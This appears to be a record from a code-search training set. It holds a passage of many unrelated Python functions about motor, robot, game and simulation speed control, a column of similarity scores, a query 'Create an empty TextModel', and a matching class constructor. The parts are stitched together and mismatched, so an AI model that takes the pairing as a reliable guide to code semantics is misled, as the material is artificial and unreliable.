1\n else:\n seconds += 2\n\n if direction == 'left':\n v_l = self.rpm_to_rps(inside_rpm)\n v_r = self.rpm_to_rps(outside_rpm)\n else:\n v_r = self.rpm_to_rps(inside_rpm)\n v_l = self.rpm_to_rps(outside_rpm)\n\n #print(\"2inside: rpm: \", inside_rpm)\n #print(\"2outside: rpm: \", outside_rpm)\n \n #print(\"2.1: v_l: \", v_l)\n #print(\"2.1: v_r: \", v_r)\n\n # Set wheel drive rates.\n self.set_wheel_drive_rates(v_l, v_r)\n\n # Sleep during the turn.\n time.sleep(seconds)\n\n # Stop\n self.stop()\n \n # Move forward 24 inches.\n self.forward(24)", "def chacha(self):\n self.right()\n time.sleep(2)\n self.stop()\n self.back()\n time.sleep(1)\n self.servo(1000)\n time.sleep(1)\n self.stop()\n self.fwd()\n time.sleep(1)\n self.stop()\n self.servo(2000)\n time.sleep(1)\n self.stop()\n self.left()\n time.sleep(2)\n self.stop()", "def _speedDiff(self, position, speed, action):\n return (action/(1 + self._hill_diff(position)**2)\n - 9.81 * self._hill_diff(position) /\n (1 + self._hill_diff(position)**2)\n - ((self._hill_diff(position) * self._hill_diff_diff(position)) \n * (speed**2))/(1 + self._hill_diff(position)**2))", "def setspeed(speed):\n if speed is None:\n click.echo(\"speed value is required\")\n raise click.Abort()\n\n for fan in range(_wrapper_get_num_fans()):\n status = _wrapper_set_fan_speed(fan, speed)\n if not status:\n click.echo(\"Failed\")\n sys.exit(1)\n\n click.echo(\"Successful\")", "def setStartSpeed(self, pulses_per_sec):\n cmd_string = 'v{0}'.format(pulses_per_sec)\n self.sim_speed_change = True\n self.cmd_chain += cmd_string", "def set_speed(self, speed_mps):\n speed_cmd = CommandLongRequest()\n speed_cmd.command = 178\n speed_cmd.param1 = 1\n speed_cmd.param2 = speed_mps\n speed_cmd.param3 = -1\n speed_cmd.param4 = 0\n\n rospy.loginfo(\n CBLUE2 + \"Setting speed to {}m/s\".format(str(speed_mps)) + CEND)\n response = self.command_client(speed_cmd)\n\n if response.success:\n rospy.loginfo(\n CGREEN2 + \"Speed set successfully with code {}\".format(str(response.success)) + CEND)\n rospy.loginfo(\n CGREEN2 + \"Change Speed result was {}\".format(str(response.result)) + CEND)\n return 0\n else:\n rospy.logerr(\n CRED2 + \"Speed set failed with code {}\".format(str(response.success)) + CEND)\n rospy.logerr(\n CRED2 + \"Speed set result was {}\".format(str(response.result)) + CEND)\n return -1", "def move(self):\n self.position += self.speed", "def twist_to_rover_command(linear, angular):\n\n if linear > max_speed:\n linear = max_speed\n elif linear < -max_speed:\n linear = -max_speed\n\n if angular > max_angular_speed:\n angular = max_angular_speed\n elif angular < -max_angular_speed:\n angular = -max_angular_speed\n\n linear_speed = linear / max_speed # linear_speed should now be in [-1, 1]\n angular_speed = angular / max_angular_speed # angular_speed should now [-1,1]\n\n linear_val = linear_speed * max_throttle\n angular_val = angular_speed * max_steering\n\n throttle = 0\n steering = 0\n\n if linear_val == 0:\n throttle = abs(angular_val)\n if angular_val < 0:\n steering = 49\n elif angular_val > 0:\n steering = -49\n else:\n throttle = linear_val\n steering = 0\n\n return str(round(throttle)) + ':' + str(round(steering))", "def tweak_base(*args):\n\n up = utils.arrow_up\n down = utils.arrow_down\n left = utils.arrow_left\n right = utils.arrow_right\n shift_up = utils.shift_arrow_up\n shift_down = utils.shift_arrow_down\n plus = utils.plus\n minus = utils.minus\n scale = 0.1\n abs_status = '{}: {:.4f}'\n exp_status = '{}: {:.4e}'\n\n if len(args) == 1:\n move_keys = (left, right)\n scale_keys = (up, down, plus, minus, shift_up, shift_down)\n elif len(args) == 2:\n move_keys = (left, right, up, down)\n scale_keys = (plus, minus, shift_up, shift_down)\n\n def show_status():\n if scale >= 0.0001:\n template = abs_status\n else:\n template = exp_status\n text = [template.format(mot.name, mot.wm()) for mot in args]\n text.append(f'scale: {scale}')\n print('\\x1b[2K\\r' + ', '.join(text), end='')\n\n def usage():\n print() # Newline\n if len(args) == 1:\n print(\" Left: move x motor backward\")\n print(\" Right: move x motor forward\")\n print(\" Up or +: scale*2\")\n print(\" Down or -: scale/2\")\n else:\n print(\" Left: move x motor left\")\n print(\" Right: move x motor right\")\n print(\" Down: move y motor down\")\n print(\" Up: move y motor up\")\n print(\" + or Shift_Up: scale*2\")\n print(\" - or Shift_Down: scale/2\")\n print(\" Press q to quit.\"\n \" Press any other key to display this message.\")\n print() # Newline\n\n def edit_scale(scale, direction):\n \"\"\"Function used to change the scale.\"\"\"\n if direction in (up, shift_up, plus):\n scale = scale*2\n elif direction in (down, shift_down, minus):\n scale = scale/2\n return scale\n\n def movement(scale, direction):\n \"\"\"Function used to know when and the direction to move the motor.\"\"\"\n try:\n if direction == left:\n args[0].umvr(-scale, log=False, newline=False)\n elif direction == right:\n args[0].umvr(scale, log=False, newline=False)\n elif direction == up:\n args[1].umvr(scale, log=False, newline=False)\n elif direction == down:\n args[1].umvr(-scale, log=False, newline=False)\n except Exception as exc:\n logger.error('Error in tweak move: %s', exc)\n logger.debug('', exc_info=True)\n\n start_text = ['{} at {:.4f}'.format(mot.name, mot.wm()) for mot in args]\n logger.info('Started tweak of ' + ', '.join(start_text))\n\n # Loop takes in user key input and stops when 'q' is pressed\n is_input = True\n while is_input is True:\n show_status()\n inp = utils.get_input()\n if inp in ('q', None):\n is_input = False\n elif inp in move_keys:\n movement(scale, inp)\n elif inp in scale_keys:\n scale = edit_scale(scale, inp)\n else:\n usage()\n print()\n logger.info('Tweak complete')", "def set_speed(self, speed):\n self._kernel.set_speed(float(speed))", "def match_car_speed(self, fast_car, slow_car):\n fast_car.current_speed = slow_car.current_speed", "def set_motor_speed(self, speed=0.0):\r\n self.target_speed = speed", "def convert_speed(self, event):\n try:\n #Compare other unit to one unit(meters/second)\n current_value, current_unit = float(\"0\" + str(self.v.get())), self.dropdown.get()\n unit_comp = {\"Mach number\": 340.2933, \"Nm/24hr\": 0.021435, \"centimeters/minute\": 0.000167, \"centimeters/second\": 0.01, \"feet/hour\": 8.5e-05, \"feet/minute\": 0.00508, \"feet/second\": 0.3048, \"inches/minute\": 0.000423, \"inches/second\": 0.0254, \"kilometers/hour\": 0.277778, \"kilometers/second\": 1000.0, \"knots\": 0.514444, \"meters/hour\": 0.000278, \"meters/minute\": 0.016667, \"meters/second\": 1.0, \"miles/hour\": 0.44704, \"miles/minute\": 26.8224, \"miles/second\": 1609.344, \"nautical miles/hour\": 0.514444, \"speed of light\": 299790000.0, \"speed of sound\": 343.0, \"yards/hour\": 0.000254, \"yards/minute\": 0.01524, \"yards/second\": 0.9144}\n value_comp, printer = current_value * unit_comp[current_unit], \"\"\n unit_list = sorted(unit_comp.keys())\n unit_list.remove(current_unit)\n for unit in unit_list:\n printer += \"To %s \" % unit + \" \" * (max([len(i) for i in unit_list]) - len(unit)) + str(value_comp / unit_comp[unit]) + [\"\", \"\\n\"][unit_list[-1] != unit]\n except ValueError: #In case user enter the other type of value, not Int or Float\n printer = \"Value is invalid.\"\n self.print_text(printer)", "def increase_speed(self):\n self.ship_speed*=self.speedup_scale\n self.bullet_speed*=self.speedup_scale\n self.alien_speed*=self.speedup_scale\n self.alien_points=int(self.alien_points*self.score_scale)\n print(self.alien_points)", "def set_speed_manual(self, command_logger=None):\r\n pass", "def set_speed(self, speed):\n self.device.set_speed(speed)\n return \"OK\"", "def move_friendly(self):\n self.friendly_pos[0]+=self.x_speed\n self.friendly_pos[1]+=self.y_speed", "def setSpeedEngines(leftSpeed: int, rightSpeed: int):\n pass", "def increase_speed(self):\n self.covid_horizontal_speed_factor *= self.speedup_scale\n self.bullet_speed_factor *= self.speedup_scale\n self.hero_speed_factor *= self.speedup_scale", "def smooth_drive(self, distance, linear_speed):\n ### EXTRA CREDIT\n # TODO\n pass # delete this when you implement your code", "def set_gripper_speed(self, speed, **kwargs):\r\n return self._arm.set_gripper_speed(speed, **kwargs)", "def change_speed(self, speed):\n\n self.__corrds[self.X_SPEED], self.__corrds[self.Y_SPEED] = speed\n if type(speed) != tuple:\n raise ValueError('speed must be a tuple of the form (sp_x, sp_y)')", "async def async_set_speed(self, speed: str) -> None:\n switch_states = self._relay_state_map.get(speed)\n if not switch_states:\n LOG.warning(\n f\"LUNOS '{self._name}' DOES NOT support speed '{speed}'; ignoring speed change.\"\n )\n return\n\n # save the pending relay states (in case multiple changes are queued up in\n # event loop only the most recent should \"win\")\n self._pending_relay_w1 = switch_states[0]\n self._pending_relay_w2 = switch_states[1]\n\n # wait after any relay was last changed to avoid LUNOS controller misinterpreting toggles\n #\n # FIXME: there really should be a queue of changes with a delay between each before application\n # instead of this (and clearing out of old changes IF any are queued up). This existing\n # implementation here does not work if someone starts clicking changes again and again\n await self._throttle_state_changes(MINIMUM_DELAY_BETWEEN_STATE_CHANGES)\n\n if self._pending_relay_w1 is not None:\n LOG.info(\n f\"Changing LUNOS '{self._name}' speed: {self._current_speed} -> {speed}\"\n )\n await self.set_relay_switch_state(self._relay_w1, self._pending_relay_w1)\n await self.set_relay_switch_state(self._relay_w2, self._pending_relay_w2)\n self._pending_relay_w1 = self._pending_relay_w2 = None\n\n # update our internal state immediately (instead of waiting for callback relays have changed)\n self._update_speed(speed)", "def turtle_movement(turtle_shape, bg_color, turtle_color, turtle_speed):\n turtle_name = initialize(turtle_shape, bg_color,\n turtle_color, turtle_speed)\n\n for i in range(36):\n for i in range(4):\n turtle_name.forward(200)\n turtle_name.right(90)\n turtle_name.right(10)", "def tick():\n move_balls(targets_speed)\n move_super_balls(targets_speed * 2)", "def speed(self, speed=None):\n speeds = {'fastest':0, 'fast':10, 'normal':6, 'slow':3, 'slowest':1 }\n if speed is None:\n return self._speed\n if speed in speeds:\n speed = speeds[speed]\n elif 0.5 < speed < 10.5:\n speed = int(round(speed))\n else:\n speed = 0\n self.pen(speed=speed)", "def set_animation_speed(self, speed):\n self.m_animation_speed = self.calculate_animation_speed(speed)", "def moonPass(deltaTime, duration, startingX, startingY, startingVelocityX, startingVelocityY, massRocket, rocketForce, rocketTransferDuration, moonStartAngle, manual = False):\r\n global rocketStage # initialising the global variables\r\n global massMoon\r\n \r\n moonPosX = earthMoonDistance*math.sin(math.pi*moonStartAngle/180) #m Here we have the x coordinate of the moon\r\n moonPosY = earthMoonDistance*math.cos(math.pi*moonStartAngle/180) #m Here the Y coordinate\r\n moonVelocity = math.sqrt(G*massEarth/earthMoonDistance) #the velocity of the moon as calculated by the Vis-Visa equation for a circle\r\n velocityXMoon = moonVelocity*math.cos(math.pi*moonStartAngle/180) # here we set the x and y velocity components of the moon's starting conditions\r\n velocityYMoon = -moonVelocity*math.sin(math.pi*moonStartAngle/180)\r\n \r\n h = deltaTime # this is the time step size, which can be altered by the user.\r\n time = [] # creating an empty array where the values of time are stored.\r\n time.append(0) #setting the first value in the time array to 0s\r\n kPos = [[0 for x in range(4)] for y in range(2)] #here we create multi-demensional arrays, 4x2, where the values for k in the runge kutta method are stored. This array is dedicated to the k's for position.\r\n kV = [[0 for x in range(4)] for y in range(2)] # same as the line above but for k's used in the velocity calculations.\r\n velocityX = [] #creating more empty arrays, for velocity, position and speed.\r\n velocityY = []\r\n posX = []\r\n posY = []\r\n speed = []\r\n \r\n velocityX.append(startingVelocityX) #here we append the first value of the array to the starting values defined by the user.\r\n velocityY.append(startingVelocityY)\r\n posX.append(startingX)\r\n posY.append(startingY)\r\n i = 0 # i is the counter used in the while loop below, to keep track of the number of iterations performed.\r\n speed.append(math.sqrt(velocityX[i]**2+velocityY[i]**2)) #here we append the starting value for the scalar value speed.\r\n \r\n moonPosXArray = [] #initialising arrays for the moon's position and velocity\r\n moonPosYArray = []\r\n velocityXMoonArray = []\r\n velocityYMoonArray = [] \r\n moonPosXArray.append(moonPosX)\r\n moonPosYArray.append(moonPosY)\r\n \r\n startingAngle = 180*math.atan(startingY/-startingX)/math.pi #calculate starting angle\r\n orbitalRadius = [] #Initialise this empty array which will hold the distace from Earth\r\n moonDistance = []\r\n totalEnergy = []\r\n angle = [] # This array will hold the anglular position of the projectile from Earth with 0 degrees pointing towards the starting position.\r\n orbitalRadius.append((math.sqrt(startingX**2+startingY**2))) #here we append the starting orbital radius at the starting position\r\n moonDistance.append((math.sqrt((startingX-moonPosX)**2+(startingY-moonPosY)**2)))\r\n angle.append(startingAngle) #here we append the starting angle\r\n totalEnergy.append(0.5*(startingVelocityX**2+startingVelocityY**2)-G*massEarth/(orbitalRadius[0])-G*massMoon/(moonDistance[0])) \r\n orbitCount = 0 # uneeded\r\n looped = True # unneeded\r\n orbitLoop = -1 # unndeeded\r\n negativeSection = 0 # In order to caculate the anglular position in 360 degrees circles, then 180 degrees needs to be added on to the trigonometric equation in certian quatiles. This variable contains the correct factor.\r\n \r\n rocketStage = 1 #initialise the stage of the projectile flight to 1\r\n \r\n while rocketStage != 6 and time[i]<duration: # while the rocket has completed all of the stages of flight and the timer hasn't run out for maximum allowed flight length.\r\n #k1s\r\n kPos[0][0] = velocityX[i] # this value is k1 for the x position. It is just the velocity of the rocket at its current position.\r\n kPos[1][0] = velocityY[i] #this value is k1 for the y position\r\n kV[0][0] = moonCalcX(posX[i], posY[i], moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) #this value is k1 for the x velocity. At its current position what is the acceleration of the projectile\r\n kV[1][0] = moonCalcY(posX[i], posY[i], moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) # this value is k1 for the y velocity\r\n \r\n #k2s\r\n kPos[0][1] = velocityX[i] + h*kV[0][0]/2 #what would its velocity be if it carried on at its initial acceleration (calculated in k1 for x velocity) for half a time step\r\n kPos[1][1] = velocityY[i] + h*kV[1][0]/2\r\n kV[0][1] = moonCalcX(posX[i] + h*kPos[0][0]/2, posY[i] + h*kPos[1][0]/2, moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) # if it continued at the velocity in k2 for x position for half a time step what would the acceleration on the projectile be.\r\n kV[1][1] = moonCalcY(posX[i] + h*kPos[0][0]/2, posY[i] + h*kPos[1][0]/2, moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce)\r\n \r\n #k3s\r\n kPos[0][2] = velocityX[i] + h*kV[0][1]/2 # if it carried on at the acceleration calculated for k2 in x velocity for half a time step, what would its velocity be\r\n kPos[1][2] = velocityY[i] + h*kV[1][1]/2\r\n kV[0][2] = moonCalcX(posX[i] + h*kPos[0][1]/2, posY[i] + h*kPos[1][1]/2, moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) # if carried on at the velocity calculated in k2 for half a time step then what would its accelaration be\r\n kV[1][2] = moonCalcY(posX[i] + h*kPos[0][1]/2, posY[i] + h*kPos[1][1]/2, moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce)\r\n \r\n #k4s\r\n kPos[0][3] = velocityX[i] + h*kV[0][2] # if it carried on at the acceleration calcualted in k3 fro a whole timestep, then what would its velocity be \r\n kPos[1][3] = velocityY[i] + h*kV[1][2]\r\n kV[0][3] = moonCalcX(posX[i] + h*kPos[0][2], posY[i] + h*kPos[1][2], moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) #if it continued at the velocity calculated in k3 for a whole time step, then what would its accelaration be\r\n kV[1][3] = moonCalcY(posX[i] + h*kPos[0][2], posY[i] + h*kPos[1][2], moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce)\r\n \r\n time.append(time[i]+h) #here the new times step is appended to the time array\r\n velocityX.append(velocityX[i]+(h/6)*(kV[0][0]+2*kV[0][1]+2*kV[0][2]+kV[0][3])) # the velocity in x is appended, after combining the ks for velocity in x\r\n velocityY.append(velocityY[i]+(h/6)*(kV[1][0]+2*kV[1][1]+2*kV[1][2]+kV[1][3])) # the velocity in y is appended, after combining the ks for velocity in y\r\n posX.append(posX[i]+(h/6)*(kPos[0][0]+2*kPos[0][1]+2*kPos[0][2]+kPos[0][3])) # the x position is appended, after combinging the ks for x position\r\n posY.append(posY[i]+(h/6)*(kPos[1][0]+2*kPos[1][1]+2*kPos[1][2]+kPos[1][3])) # the y position is appended, after combinging the ks for y position\r\n speed.append(math.sqrt(velocityX[i]**2+velocityY[i]**2)) # the speed is calculated and appended, by finding the magnitude of the velocity in the x-y plane\r\n i +=1 # i is incremented by 1\r\n \r\n if manual == False: # if the moon is not stationary\r\n moonPosX, moonPosY, velocityXMoon, velocityYMoon = dynamicMoon(moonPosX, moonPosY, velocityXMoon, velocityYMoon, h) # call the function to find the position and velocity of the moon.\r\n moonPosXArray.append(moonPosX) #add the values to the relevent arrays\r\n moonPosYArray.append(moonPosY)\r\n velocityXMoonArray.append(velocityXMoon)\r\n velocityYMoonArray.append(velocityYMoon)\r\n \r\n \r\n if time[i-1]+h > duration and manual == True: # if we come to the end of the simulation\r\n rocketStage == 6\r\n \r\n orbitalRadius.append(math.sqrt(posX[i]**2+posY[i]**2)) # the orbital radius is calculated and appended\r\n moonDistance.append(math.sqrt((posX[i]-moonPosX)**2+(posY[i]-moonPosY)**2)) # calculating the distance to the moon\r\n totalEnergy.append(0.5*(velocityX[i]**2+velocityY[i]**2)-G*massEarth/(orbitalRadius[i])-G*massMoon/(moonDistance[i])) # the total energy at each time step is calculated by summing the gravitational potential with the kinetic \r\n if posX[i] > 0: # if the x coordinate of its position in positive (remember Earth is at (0,0))\r\n negativeSection = 1 \r\n elif posY[i] < 0: # if the y coordinate of its position is negative\r\n negativeSection = 2\r\n else:\r\n negativeSection = 0\r\n angle.append(180*math.atan(posY[i]/-posX[i])/math.pi + 180*negativeSection) # calculate and append the angle, adding on the correct factor of 180 to create the 360 degree circle\r\n \r\n if manual == True and orbitalRadius[i] <= earthRadius: # if a collision with Earth is detected\r\n rocketStage = 6 # stop the simulation\r\n print(\"Collision with Earth Detected\")\r\n \r\n if manual == True and moonDistance[i] <= moonRadius: #if a collision with the moon is detected\r\n rocketStage = 6 # stop the simulation\r\n print(\"Collision with Moon Detected\")\r\n \r\n if manual == False: # all the different stages for the automatic simulation, each different stage corresponds to the force that needs to be applied on the rocket.\r\n if i > 1: # if there has been more than one iteration of the while loop\r\n if angle[i]-angle[i-1] < 0 and rocketStage == 2: #if the angle jumps from 360 degrees to 0 which it will do on every complete circle.\r\n rocketStage = 2.5 \r\n if angle[i]-angle[i-1] < 0 and rocketStage == 4:#if the angle jumps from 360 degrees to 0 which it will do on every complete circle.\r\n rocketStage = 4.5\r\n if angle[i]-angle[i-1] < 0 and rocketStage == 5:#if the angle jumps from 360 degrees to 0 which it will do on every complete circle.\r\n rocketStage = 5.25\r\n if angle[i]-angle[i-1] < 0 and rocketStage == 5.75:#if the angle jumps from 360 degrees to 0 which it will do on every complete circle.\r\n rocketStage = 6\r\n if rocketStage == 1 and angle[i]/360 > 1-rocketTransferDuration/2: #if rocket stage equals 1 and the anle where the rockets come on has been exceeded\r\n rocketStage = 2\r\n if rocketStage == 2.5 and angle[i]/360 > rocketTransferDuration/2: #if rocket stage equals 2.5 and the anle where the rockets go off has been exceeded\r\n rocketStage = 3\r\n if rocketStage == 3 and angle[i]/360 > 0.75-rocketTransferDuration/48: #if rocket stage equals 3 and the anle where the rockets come on has been exceeded\r\n rocketStage = 4\r\n if rocketStage == 4 and angle[i]/360 > 0.75+rocketTransferDuration/48: #if rocket stage equals 4.5 and the anle where the rockets go off has been exceeded\r\n rocketStage = 5\r\n if rocketStage == 5.25 and angle[i]/360 > 0.25-rocketTransferDuration/3.4:\r\n rocketStage = 5.5\r\n if rocketStage == 5.5 and angle[i]/360 > 0.25+rocketTransferDuration/3.4:\r\n rocketStage = 5.75\r\n\r\n return posX, posY, speed, time, totalEnergy, moonPosXArray, moonPosYArray, velocityXMoonArray, velocityYMoonArray", "def changeSpeed(self, speed, accel):\n\t\t\n max_speed = 1000\n min_speed = 0\n \n # limit max speed\n if speed >= max_speed:\n speed = max_speed\n \n # limit min speed\n if speed <= min_speed:\n speed = min_speed\n \n command = struct.pack(\"<BHHB\", 0x24, speed, accel, 0x01)\n self.sendCommand(command)", "def steer(direction):\n if direction == 1:\n steerMotor.run(Adafruit_MotorHAT.FORWARD)\n steerMotor.setSpeed(255)\n if direction == -1:\n steerMotor.run(Adafruit_MotorHAT.BACKWARD)\n steerMotor.setSpeed(255)\n if direction == 0:\n steerMotor.setSpeed(0)\n steerMotor.run(Adafruit_MotorHAT.RELEASE)", "def speed(n):\n turtleTmp.speed(max(1, min(n, 10)))", "def set_speed(self, speed, motor):\n self.driver.set_speed(speed, motor)\n self.last_control = time.time()", "def set_speed(self, speed, ports='ABCD'):\n\n speed += self.avg_speed\n if self.inverted:\n speed = -speed\n\n if speed > self.margin:\n speed = self.margin\n elif speed < -self.margin:\n speed = self.margin\n\n for p in ports:\n if self.motors[p].connected:\n self.motors[p].run_forever(speed_sp=speed, speed_regulation=True)\n else:\n print(\"Cant run motor on\", p, \"- not connected\")", "def on_speed_change(self, event) -> None:\r\n\r\n speed_level = int(self.speed_scale.get())\r\n self.animator.time_per_gen = self.TIMES_PER_GEN[speed_level]", "def move(self, *ms):\n\n # Map cube notation to corresponding clockwise movements.\n mmap = {\n 'L': (2, -1, -1), 'M': (2, 0, -1), 'R': (2, 1, 1),\n 'U': (1, -1, -1), 'E': (1, 0, 1), 'D': (1, 1, 1),\n 'F': (0, -1, -1), 'S': (0, 0, -1), 'B': (0, 1, 1),\n 'X': (2, 2, 1), 'Y': (1, 2, -1), 'Z': (0, 2, -1)\n }\n\n for m in ms:\n if m == '#':\n # End the scramble if '#' is found.\n self.scrambling = False\n else:\n axis, slice, dir = mmap[m[0].upper()]\n if \"'\" in m:\n # Invert the move.\n self.anims.add(Anim(self, axis, slice, -dir, self.speed))\n m = m.replace(\"'\", '')\n elif '2' in m:\n # Double the move.\n self.anims.add(Anim(self, axis, slice, dir, self.speed), Anim(self, axis, slice, dir, self.speed))\n else:\n self.anims.add(Anim(self, axis, slice, dir, self.speed))\n m = m + \"'\"\n\n # Push inverse move to history queue.\n self.moved.push(m)", "def setSpeed(self, rpm):\n self.delayLength = 30.0/(self.totalSteps*rpm)", "def example_move(self):\n self.right() # start rotating right\n time.sleep(1) # turn for a second\n self.stop() # stop\n self.servo(1000) # look right\n time.sleep(.25) # give your head time to move\n self.servo(2000) # look left", "def example_move(self):\n self.right() # start rotating right\n time.sleep(1) # turn for a second\n self.stop() # stop\n self.servo(1000) # look right\n time.sleep(.25) # give your head time to move\n self.servo(2000) # look left", "def increase_speed(self):\n self.ship_speed_factor *= self.speed_up_scale\n self.bullet_speed_factor *= self.speed_up_scale\n self.alien_speed_factor *= self.speed_up_scale", "def scenario1(height, speed):\n time = math.sqrt((2 * height) / 9.81)\n result = speed * time\n return result", "def move_car(self, linear_speed, angular_speed, epsilon=0.05, update_rate=10, min_laser_distance=-1):\n cmd_vel_value = Twist() # Describes linear motion and angular motion of robot\n cmd_vel_value.linear.x = linear_speed\n cmd_vel_value.angular.z = angular_speed\n rospy.logwarn(\"CATVehicle Base Twist Cmd>>\" + str(cmd_vel_value))\n self._check_publishers_connection()\n self._cmd_vel_pub.publish(cmd_vel_value)\n time.sleep(0.01) # This is the timespan per timestep?\n #time.sleep(0.02)\n \n \"\"\" # Implement this later?\n self.wait_until_twist_achieved(cmd_vel_value,\n epsilon,\n update_rate,\n min_laser_distance)\n \"\"\"", "def _update_speed(self, speed):\n if speed is None:\n return\n if speed == self._current_speed:\n return\n\n self._current_speed = speed\n self._update_speed_attributes()\n LOG.info(\n f\"Updated LUNOS {self._name}: {self.percentage}% {self._current_speed}\"\n )", "def move(self, speed=1):\n self.set_motor(self.left_motor, 'left', speed)\n self.set_motor(self.right_motor, 'right', speed)\n time.sleep(0.5)", "def main():\n moveList = ('R4, R3, L3, L2, L1, R1, L1, R2, R3, L5, L5, R4, L4, R2, R4, '\n 'L3, R3, L3, R3, R4, R2, L1, R2, L3, L2, L1, R3, R5, L1, L4, '\n 'R2, L4, R3, R1, R2, L5, R2, L189, R5, L5, R52, R3, L1, R4, '\n 'R5, R1, R4, L1, L3, R2, L2, L3, R4, R3, L2, L5, R4, R5, L2, '\n 'R2, L1, L3, R3, L4, R4, R5, L1, L1, R3, L5, L2, R76, R2, R2, '\n 'L1, L3, R189, L3, L4, L1, L3, R5, R4, L1, R1, L1, L1, R2, '\n 'L4, R2, L5, L5, L5, R2, L4, L5, R4, R4, R5, L5, R3, L1, L3, '\n 'L1, L1, L3, L4, R5, L3, R5, R3, R3, L5, L5, R3, R4, L3, R3, '\n 'R1, R3, R2, R2, L1, R1, L3, L3, L3, L1, R2, L1, R4, R4, L1, '\n 'L1, R3, R3, R4, R1, L5, L2, R2, R3, R2, L3, R4, L5, R1, R4, '\n 'R5, R4, L4, R1, L3, R1, R3, L2, L3, R1, L2, R3, L3, L1, L3, '\n 'R4, L4, L5, R3, R5, R4, R1, L2, R3, R5, L5, L4, L1, L1')\n moveList = moveList.replace(' ', '').split(',')\n\n elf = Path()\n\n for move in moveList:\n start = [elf.x, elf.y]\n print('Elf turning {} and walking for {} steps.').format(\n move[0], move[1:])\n elf.move(move[0], move[1:])\n end = [elf.x, elf.y]\n if(addMoveToList(elf, start, end)):\n break\n print('Elf ended in position {},{}').format(elf.x, elf.y)\n print('Shortest distance from origin to EB HQ is: {}').format(\n abs(elf.x) + abs(elf.y))", "def _validate_speed(self, speed: pint.Quantity | None) -> str:\n # Validated speeds are used as command argument, with empty string being the default for None\n if speed is None:\n return \"\"\n\n # Alert if out of bounds but don't raise exceptions, according to general philosophy.\n # Target flow rate too high\n if speed < ureg.Quantity(\"2 sec/stroke\"):\n speed = ureg.Quantity(\"2 sec/stroke\")\n warnings.warn(\n f\"Desired speed ({speed}) is unachievable!\"\n f\"Set to {self._seconds_per_stroke_to_flowrate(speed)}\"\n f\"Wrong units? A bigger syringe is needed?\"\n )\n\n # Target flow rate too low\n if speed > ureg.Quantity(\"3692 sec/stroke\"):\n speed = ureg.Quantity(\"3692 sec/stroke\")\n warnings.warn(\n f\"Desired speed ({speed}) is unachievable!\"\n f\"Set to {self._seconds_per_stroke_to_flowrate(speed)}\"\n f\"Wrong units? A smaller syringe is needed?\"\n )\n\n return str(round(speed.m_as(\"sec / stroke\")))", "def wheel(text, func, args):\n animation = \"|/-\\\\\"\n idx = 0\n thread = Thread(target=func, args=args)\n thread.start()\n while thread.join(0.1) or thread.isAlive():\n print(Fore.WHITE + text + \" \" + animation[idx % len(animation)], end=\"\\r\")\n idx += 1", "def set_speed(self,value):\n if (value>self.get_max_speed()):\n print \"asked to set the speed to %f but the max speed is %f\\n\" % (value,self.get_max_speed())\n else:\n return self.put_par(\"slew_speed\",value)", "def use_normal_speed(self):\n command = _build_robovac_command(RobovacModes.SET_SPEED, RobovacCommands.SLOW_SPEED)\n message = self._build_command_user_data_message(command)\n\n self._send_packet(message, False)" ]
[ "0.6296124", "0.6269911", "0.6195199", "0.61470234", "0.6099951", "0.6089762", "0.6049702", "0.6044615", "0.6016867", "0.5855935", "0.58457875", "0.5815366", "0.5801311", "0.5796839", "0.5796374", "0.57753795", "0.57381445", "0.5728528", "0.57273424", "0.57228905", "0.5700719", "0.5700719", "0.5695538", "0.5690546", "0.5664009", "0.5658058", "0.5646326", "0.56377226", "0.5622351", "0.5612868", "0.56041074", "0.55974925", "0.55471134", "0.55283546", "0.5522026", "0.5509901", "0.54995036", "0.54619974", "0.5452868", "0.54459524", "0.5425512", "0.5423365", "0.5419042", "0.54095817", "0.54095817", "0.54060346", "0.5392781", "0.53910226", "0.53877926", "0.5384184", "0.5364533", "0.53571814", "0.53535056", "0.5350742", "0.5346358", "0.5341502", "0.5338661", "0.5332979", "0.53325087", "0.53324497", "0.53245145", "0.5323732", "0.5315173", "0.53078836", "0.5305938", "0.52980566", "0.5291466", "0.52844733", "0.5283922", "0.52826995", "0.5274159", "0.5264728", "0.5251199", "0.5245984", "0.5244961", "0.5236726", "0.5227664", "0.52192193", "0.5217354", "0.5209577", "0.5208714", "0.5206564", "0.52058077", "0.5201316", "0.52007407", "0.51989317", "0.5197276", "0.51803076", "0.5173018", "0.5168329", "0.5168329", "0.5165849", "0.51591927", "0.51564807", "0.51562536", "0.5146226", "0.51369894", "0.51365787", "0.51282793", "0.5122189", "0.51187867" ]
0.0
-1
Create an empty TextModel.
def __init__(self): # # Create dictionaries for each characteristic # self.words = {} # For counting words self.wordlengths = {} # For counting word lengths self.stems = {} # For counting stems self.sentencelengths = {} # For counting sentence lengths # # Create another of your own # self.gerund = {} # For counting words with ing self.text = ''
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_model(self):\n self.model = None\n pass", "def __init__(self, text=None, model=None, voice_test_kind=None): # noqa: E501 # noqa: E501\n\n self._text = None\n self._model = None\n self._voice_test_kind = None\n self.discriminator = None\n\n self.text = text\n self.model = model\n self.voice_test_kind = voice_test_kind", "def create_model(self):\n pass", "def create_model(self):\n pass", "def create_model(self):\n self.create_model_file()\n self.create_model_unit_test()\n self.add_model_to_list()\n self.readme_reminder()", "def empty_model() -> Model:\n yield Model()", "def create_model(self):\n model = solph.Model(self.es)\n return model", "def build_model(self, text, n = 3):\n \n try:\n self.lm.build_model(text,n)\n except:\n raise\n \n self.vocab = Counter(words(text))\n\n return self.lm", "def createModel(self, sid=\"\"):\n return _libsbml.SBMLDocument_createModel(self, sid)", "def test_nullable_text(self):\r\n entity = NullableTextModel(text=None)\r\n entity.save()\r\n\r\n db_entity = NullableTextModel.objects.get()\r\n self.assertEquals(db_entity.text, None)", "def MakeModel(self):\n pass", "def build_model(self, text):\n text = '< ' * (self.n - 1) + text.replace(' . ', ' .%s ' % (' <' * (self.n - 1))) + ' 